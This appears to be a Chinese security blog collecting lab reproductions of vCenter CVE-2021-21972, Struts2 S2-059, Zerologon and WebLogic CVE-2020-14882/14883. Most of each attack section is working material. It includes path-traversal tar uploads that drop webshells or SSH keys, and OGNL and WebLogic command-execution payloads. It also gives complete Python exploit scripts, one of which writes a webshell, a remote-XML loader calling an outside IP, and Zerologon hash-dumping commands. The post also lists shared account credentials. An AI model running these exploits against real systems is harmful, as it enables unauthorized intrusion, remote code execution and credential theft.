我吃你家米了 - 漏洞复现

vCenter RCE（CVE-2021-21972）复现

2021-03-02T00:00:00+01:00

参考链接

https://swarm.ptsecurity.com/unauth-rce-vmware/

漏洞描述

CVE-2021-21972：未经认证的文件上传导致的RCE

影响范围

VMware vCenter Server 7.0系列 < 7.0.U1c

VMware vCenter Server 6.7系列 < 6.7.U3l

VMware vCenter Server 6.5系列 < 6.5 U3n

下载链接

百度云下载

这里提供一些百度云VIP共享账号，兄弟们可以用这些账户高速下载

当然，你也可以自行下载安装镜像：

下载这个需要登录，这里直接提供一个账户供大家使用：

xkaaconmpunoejwqcs@twzhhq.online
xkacon123j!$Ehh.onli

安装

windows

建议使用windows server 2012 R2

内存要求至少8G

推荐使用物理及安装，我在使用vmware虚拟机安装时遇到未知错误，未解决

此外，当前机器不能是域控制器

所安装的机器不能是域控制器

先安装更新Windows8.1-KB2919355-x64.msu，然后再安装更新Windows8.1-KB2999226-x64.msu

如果在安装更新时出现无法找到指定路径的错误，可创建目录C:\programdata\package cache，再重新安装即可，之后便可安装vcenter6.7

密码：

administrator@vsphere.local
qwe123...A

安装完成之后打开https://your-computer-IP/ui/进行登录

vCenter登录界面和控制面板：

linux

linux安装vCenter其实就是将虚拟机部署到esxi中的过程

linux版的vCenter叫做VCSA（vCenter Server Appliance）

在镜像中有一个ova文件，理论上来讲，直接使用vmWare workstation导入该虚拟机即可，但是我尝试过多次，均以各种报错告终，最后还是老老实实在vmware workstation中安装了esxi，然后部署vcsa

注意，在安装esxi的时候，内存要大于10G，推荐分配12G，磁盘要大于240G

我建议各位在安装的时候最好先搞一个DNS服务器（可以通过安装AD中的集成DNS实现），以配置域名，不然在安装vcsa的时候，可能会出现机器名无效的错误

安装完成

在配置的时候我设置的DNS服务器是自己的，FQDN也是penhub.space域（我的AD-DNS域）

漏洞复现

检测漏洞

在未登录的情况下直接访问https://your-computer-IP/ui/vropspluginui/rest/services/getstatus

如果返回如下响应及证明CVE-2021-21972（认证绕过）漏洞存在

针对windows环境

首先制作一个恶意的tar压缩包，这里我使用evilarc.py

使用的jsp木马是Browser.jsp

使用如下命令构造恶意压缩包：

python evilarc.py -d 2 -p 'ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport' -o win -f winexpl.tar Browser.jsp

其中-d选项指定层级，2层就足够穿越到C:\根目录了，当然为了保险起见，你可以写一个更大的值

ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport是要穿越到的目录，这个目录中的jsp文件可以直接从web端访问到

然后使用curl将制作好的恶意压缩包上传至vCenter服务器

curl -k -F "uploadFile=@winexpl.tar" https://your-computer-IP/ui/vropspluginui/rest/services/uploadova

然后访问我们的webshell（https://your-computer-IP/statsreport/Browser.jsp）可：

可以看到，我们的权限是nt authority\system

linux环境

首先验证漏洞

访问如下路径：

https://photon-machine.penhub.space/ui/vropspluginui/rest/services/getstatus

存在未授权漏洞

对于linux，我们直接写ssh公钥到/home/vsphere-ui/.ssh/authorized_keys文件

构造恶意压缩包，注意这次的格式是unix

python evilarc.py -d 2 -p 'home/vsphere-ui/.ssh' -o unix -f exp.tar authorized_key

上传恶意压缩包

curl -k -F "uploadFile=@exp.tar" https://photon-machine.penhub.space/ui/vropspluginui/rest/services/uploadova

登陆成功

这种方式看很有可能不会奏效，因为vcsa默认情况下是关闭ssh的

在esxi控制台中进入vcsa虚拟机，F2进入管理界面，输入密码，选中Troubleshooting Mode Options

可以看到，ssh默认是关闭的，你使用ssh工具去连接，也是连不上的

只有当管理员打开了这个选项的时候使用这种利用方式才行得通，但是一般情况下是不会打开的，因为没必要，esxi本身就可以远程管理

根据上面windows的利用方式，考虑上传文件到如下位置：

/usr/lib/vmware-perfcharts/tc-instance/webapps/statsreport

构造恶意压缩包

python evilarc.py -d 2 -p 'usr/lib/vmware-perfcharts/tc-instance/webapps/statsreport' -o unix -f winexpl.tar Browser.jsp

上传恶意压缩包

curl -k -F "uploadFile=@winexpl.tar" https://photon-machine.penhub.space/ui/vropspluginui/rest/services/uploadova

直接返回FAILED

估计是权限的原因，这个目录我写不进去文件

drwxr-xr-x 9 perfcharts cis 4096 Mar  7 18:38 /usr/lib/vmware-perfcharts/tc-instance/webapps/statsreport

我当前的用户是vsphere-ui，因此无法写入，上传过程中出现异常，返回FAILED

使用网上的exp，成功上传shell（冰蝎）

看了一下利用代码，利用的路径是/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global

在该路径下有很多以数字命名的目录，部分目录中存在可以直接从前端访问的资源文件

至于这个目录是怎么找到的，其实很简单，登录进vsphere html5 client之后，随便找个图片或者css文件，在vcsa中用find命令找一下就找到了

由于不知道目录名和war包名的对应关系（可能根本就没有关系，目录名是根据war部署先后顺序确定的），因此exp代码中采用了爆破的方式，将所有的目录都试一遍

Struts2-059 RCE （CVE-2019-0230）复现

2020-12-15T00:00:00+01:00

前言

阿怪前两天让帮忙复现一下这个洞，正好今天闲着没事，就弄了一下

这个洞是Struts框架的OGNL表达式语言引起的，所以我们本次复现也是通过创建一个使用了该特性的demo应用程序来完成的

参考链接：

https://blog.csdn.net/weixin_46236101/article/details/109080913

复现漏洞

这里我们直接创建一个struts应用来搭建漏洞环境

完整项目下载链接：

https://gitee.com/wochinijiamile/suiyi/raw/master/cve.7z

为了节省兄弟们的时间，我直接将项目依赖的jar包也放上来

https://gitee.com/wochinijiamile/suiyi/raw/master/repository.rar

如果你使用的是IDEA内置的maven，将压缩包下载下来解压之后放到C:\Users\your-user-name\.m2即可

在IDEA打开之后，配置好tomcat并运行，打开BurpSuite发包即可

http包：

POST /Struts2OGNLExample_war_exploded/welcome HTTP/1.1
Host: 192.168.1.105:8080
Proxy-Connection: keep-alive
Content-Length: 585
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.105:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.105:8080/Struts2OGNLExample_war_exploded/home.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=D02933EF26BDACF2754945FC7E822C79

payload=%25%7b%23_memberAccess.allowPrivateAccess%3Dtrue%2C%23_memberAccess.allowStaticMethodAccess%3Dtrue%2C%23_memberAccess.excludedClasses%3D%23_memberAccess.acceptProperties%2C%23_memberAccess.excludedPackageNamePatterns%3D%23_memberAccess.acceptProperties%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D%40java.lang.Runtime%40getRuntime()%2C%23s%3Dnew%20java.util.Scanner(%23a.exec('calc.exe').getInputStream()).useDelimiter('%5C%5C%5C%5CA')%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A''%2C%23res.print(%23str)%2C%23res.close()%0A%7d

后记

回头有空再研究一下怎么回显

CVE-2020-1472(zero-logon)

2020-11-22T00:00:00+01:00

简介

该漏洞利用netlogon的漏洞，重置目标机器的机器账户hash为空，如果针对域控制器执行该攻击，则可以导出所有域用户hash，进而提升为原管理员权限

复现过程

环境准备

首先卸载之前安装的impacket，然后通过源码安装的方式安装最新版本的impacket:

python3 -m pip uninstall impacket
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python3 setup.py install

下载dirkjanm的利用脚本：

git clone cve-2020-1472-exploit.py

这里我们的域控制器的NetBios Name为DC-01，IP为192.168.60.208，可以通过nbtscan扫描出来：

检测漏洞

下载漏洞检测脚本：CVE-2020-1472

检测目标机器是否存在漏洞：

python3 -m pip install -r requirements
python3 zerologon_tester.py DC-01 192.168.60.208

重置机器账户hash

cd CVE-2020-1472
python3 cve-2020-1472-exploit.py DC-01 192.168.60.208

利用成功，域控制器的及其账户hash被重置为空，空密码的hash值为31d6cfe0d16ae931b73c59d7e0c089c0

恢复机器账户hash

使用secretsdump导出域账户hash

secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'thug.com/DC-01$@192.168.60.208'

然后使用Administrator的账户导出域控制器的本地hash，里面包含域控制器原本的机器账户hash：

secretsdump.py -hashes :4a4558a96ba8c11aef734a34421b8068 'thug.com/Administrator@192.168.60.208'

我们只要plain_password_hex的值即可，然后使用restorepassword.py脚本恢复机器hash:

python3 restorepassword.py thug.com/dc-01@dc-01 -target-ip 192.168.60.208 -hexpass 5cab5bad12d5cbc8c6697ec700b5972a2...

再次查看域控制器的机器账户hash：

secretsdump.py -hashes :4a4558a96ba8c11aef734a34421b8068 'thug.com/Administrator@192.168.60.208' -just-dc-user dc-01\$ -just-dc-ntlm

已经恢复为原来的值

局限性

这么做不是没有弊端，因为在某些情况下，域管理员可能会禁用administrator账户或者限制该账户的行为，导致我们即使拿到域控制器的administrator账户，也无法导出域控制器存储在本地注册表中的hash（原始的机器账户hash）

但是我们可以通过先获取域中成员主机的权限，然后通过net group "domain admins" /domain获取到域内的管理员账户名，然后在使用空hash导域账户hash的时候指定这些域管理员，这样如果administrator如果存在限制，我们还可以尝试使用其他的域管理员账户来导出域控制器本地注册表中保存的hash

CVE-2020-14882~14883(Weblogic RCE)

2020-11-22T00:00:00+01:00

简介

本次复现为两个漏洞，前者CVE-2020-14882为绕过weblogic控制台认证、后者CVE-2020-14883为经过身份认证的反序列化RCE，两者结合可导致未经身份认证的RCE

参考：

复现过程

环境准备

下载docker-compose.yml文件，然后执行docker-compose up -d即可搭建出漏洞环境

但是weblogic的漏洞环境镜像比较大，下载起来比较耗时，这里直接提供百度网盘的下载链接，提取码cdlr，解压之后的文件weblogic.tar的SHA256校验和：5A16598CB64FF0724459FD1E1EC975B4303BF8C495EF3BCA6DFB4D39A4E07654

验证文件无误后，执行docker load < weblogic.tar，然后docker images查看一下刚加载进来的weblogic镜像的IMAGE ID，将docker-compose.yml文件中的vulhub/weblogic:12.2.1.3-2018改成刚才获取到的IMAGE ID即可

设置好浏览器代理，使用burp进行抓包

抓包获取cookie

在浏览器中访问：http://192.168.162.129:7001/console/css/%252e%252e%252fconsole.portal

查看burp的HTTP history，找到cookie中带有ADMINCONSOLESESSION的请求包，转到Repeater模块中

构造回显payload

构造出如下数据包：

将GET请求改为/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
在请求体中添加cmd头部，值就是你想要执行的命令:cmd:whoami

如下，执行的命令结果会显示在响应包的body中

老版本（12以下）的利用方式

由于10.x的版本没有com.tangosol.coherence.mvel2.sh.ShellSession类，需要通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext类来加载外部xml执行命令

在我们的web服务器上放置一个xml文件，内容如下：

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[touch /tmp/success2]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

其中touch /tmp/success2是我们想要执行的命令

访问如下URL即可：

http://192.168.162.129:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://144.34.164.217/theme/css/1.xml")

这种利用方式的弊端就是如果目标服务器不出网，也没啥用，因为无法加载外部的xml文件，除非你是在目标内网里面

exp脚本编写

执行命令

# -*- coding: UTF-8 -*-
import sys
import re
import requests
#下面这三行代码是为了解决requests的一个bug，就是Connection broken: IncompleteRead
#其实真正的原因我到现在也不清楚，但是下面这三行代码确实可以解决问题
#参考https://my.oschina.net/u/1538135/blog/858467
#python3.x中的httplib变成了http.client需要修改一下
import http.client
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
if len(sys.argv) <3:
    print('usage: python3 exp.py http(s):target-ip:target-port command')
    sys.exit()
baseurl = sys.argv[1]
#去掉url最后面的/
if baseurl[-1]=='/':
    baseurl = baseurl[0:-1]
#命令中包含空格的情况
cmd = sys.argv[2]
if len(sys.argv) > 3:
    i = 3
    while i < len(sys.argv):
        cmd += ' '
        cmd += sys.argv[i]
        i += 1
#调试的时候使用burp代理抓包，便于发现脚本的问题
proxy = {"http": "http://127.0.0.1:8080"}
res = baseurl + "/console/css/%252e%252e%252fconsole.portal"
#设置不跟随302重定向，不然会获取不到cookie
#response = requests.get(res, proxies=proxy,allow_redirects=False)
#忽略https证书错误的问题，第二个请求也一样
response = requests.get(res, allow_redirects=False, verify=False)
print('---------------------------------------raw header---------------------------------------')
print(response.headers)
print('---------------------------------------raw header---------------------------------------\n\n')
cookie_raw = response.headers['Set-Cookie']
matchObj = re.match( r'(.*); path=/.*?', cookie_raw, re.M|re.I)
if matchObj:
    cookie = matchObj.group(1)
    print('+++++++++++++++++++++++++++++++++++++++cookie+++++++++++++++++++++++++++++++++++++++')
    print('cookie get!\n')
    print(cookie)
    print('+++++++++++++++++++++++++++++++++++++++cookie+++++++++++++++++++++++++++++++++++++++\n\n')
else:
    print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!no cookie!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
    print('no cookie')
    print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!no cookie!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n')
    sys.exit();

#获取到cookie之后，发送第二个请求，用于执行命令
#注意 useDelimiter("\\A") 这个地方的两个\，需要再次转义，不然python会把其中一个作为
#转义符处理，导致真正发送的请求中只包含一个\
res = baseurl + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""
headers = {"cookie":cookie, "cmd":cmd}
#response = requests.get(res, headers=headers, proxies=proxy, allow_redirects=False)
response = requests.get(res, headers=headers, allow_redirects=False, verify=False)
print('+++++++++++++++++++++++++++++++++++++++cmd output+++++++++++++++++++++++++++++++++++++++')
print(response.text)    
print('+++++++++++++++++++++++++++++++++++++++cmd output+++++++++++++++++++++++++++++++++++++++')

写入文件

# -*- coding: UTF-8 -*-
import sys
import re
import requests
#下面这三行代码是为了解决requests的一个bug，就是Connection broken: IncompleteRead
#其实真正的原因我到现在也不清楚，但是下面这三行代码确实可以解决问题
#参考https://my.oschina.net/u/1538135/blog/858467
#python3.x中的httplib变成了http.client需要修改一下
import http.client
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
if len(sys.argv) <3:
    print('usage: python3 exp.py http(s):target-ip:target-port command')
    sys.exit()
baseurl = sys.argv[1]
#去掉url最后面的/
if baseurl[-1]=='/':
    baseurl = baseurl[0:-1]
#命令中包含空格的情况
cmd = sys.argv[2]
if len(sys.argv) > 3:
    i = 3
    while i < len(sys.argv):
        cmd += ' '
        cmd += sys.argv[i]
        i += 1
#调试的时候使用burp代理抓包，便于发现脚本的问题
proxy = {"http": "http://127.0.0.1:8080"}
res = baseurl + "/console/css/%252e%252e%252fconsole.portal"
#设置不跟随302重定向，不然会获取不到cookie
#response = requests.get(res, proxies=proxy,allow_redirects=False)
#忽略https证书错误的问题，第二个请求也一样
response = requests.get(res, allow_redirects=False, verify=False)
print('---------------------------------------raw header---------------------------------------')
print(response.headers)
print('---------------------------------------raw header---------------------------------------\n\n')
cookie_raw = response.headers['Set-Cookie']
matchObj = re.match( r'(.*); path=/.*?', cookie_raw, re.M|re.I)
if matchObj:
    cookie = matchObj.group(1)
    print('+++++++++++++++++++++++++++++++++++++++cookie+++++++++++++++++++++++++++++++++++++++')
    print('cookie get!\n')
    print(cookie)
    print('+++++++++++++++++++++++++++++++++++++++cookie+++++++++++++++++++++++++++++++++++++++\n\n')
else:
    print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!no cookie!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
    print('no cookie')
    print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!no cookie!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n')
    sys.exit();

#获取到cookie之后，发送第二个请求，用于执行命令
#注意 useDelimiter("\\A") 这个地方的两个\，需要再次转义，不然python会把其中一个作为
#转义符处理，导致真正发送的请求中只包含一个\
res = baseurl + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22data='你的经过base64编码的马子';data=new String(new sun.misc.BASE64Decoder().decodeBuffer(data));out=new java.io.PrintWriter('你想要写入文件的绝对路径，这个可以通过前面的命令执行脚本获得');out.print(data);out.close();%22);"""
headers = {"cookie":cookie, "cmd":cmd}
#response = requests.get(res, headers=headers, proxies=proxy, allow_redirects=False)
response = requests.get(res, headers=headers, allow_redirects=False, verify=False)
print('+++++++++++++++++++++++++++++++++++++++cmd output+++++++++++++++++++++++++++++++++++++++')
print(response.text)    
print('+++++++++++++++++++++++++++++++++++++++cmd output+++++++++++++++++++++++++++++++++++++++')

用法：

python3 exp.py http://127.0.0.1:7001 -